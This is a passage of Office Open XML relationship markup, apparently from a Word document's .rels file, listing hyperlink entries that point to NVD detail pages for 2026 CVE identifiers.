Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId293" /><Relationship 